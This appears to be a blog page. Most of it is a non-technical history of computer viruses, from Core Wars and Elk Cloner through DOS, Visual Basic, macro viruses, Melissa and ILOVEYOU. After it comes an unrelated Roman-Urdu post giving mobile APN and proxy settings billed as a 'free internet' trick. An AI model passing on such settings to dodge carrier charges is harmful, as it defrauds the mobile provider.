These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.



part 6


Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers-  were identified.

part 7

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.


Jazz free Internet

 Jazz free Internet

Aasalam-0-alikum Ameed karta Hon Sub ALLAH k Karam sey bilkul theek thak hon gye or DUa karta hn k AP ko ALLAH PAK APNI hefazat may RAkhe, AMeeen........
ji aj mein ufone ki trick le kr Hazar Howa hn Ameed karta HOn sub ko achi lage gi or Sub ko Pasnd aye gi...
ye first dono wali
setting sey buhut achi speed ati hai is leye is ka connection name mein ne A1 rakha hai......

Connection Name : Jazz InternetAccess Point : Mms.Mobilinkworld.ComProxy Server : 172.24.97.29Proxy Server PortHome Page : Your Choice.... 



Hey, we've just launched a new custom color Blogger template. You'll like it - https://t.co/quGl87I2PZ
Join Our Newsletter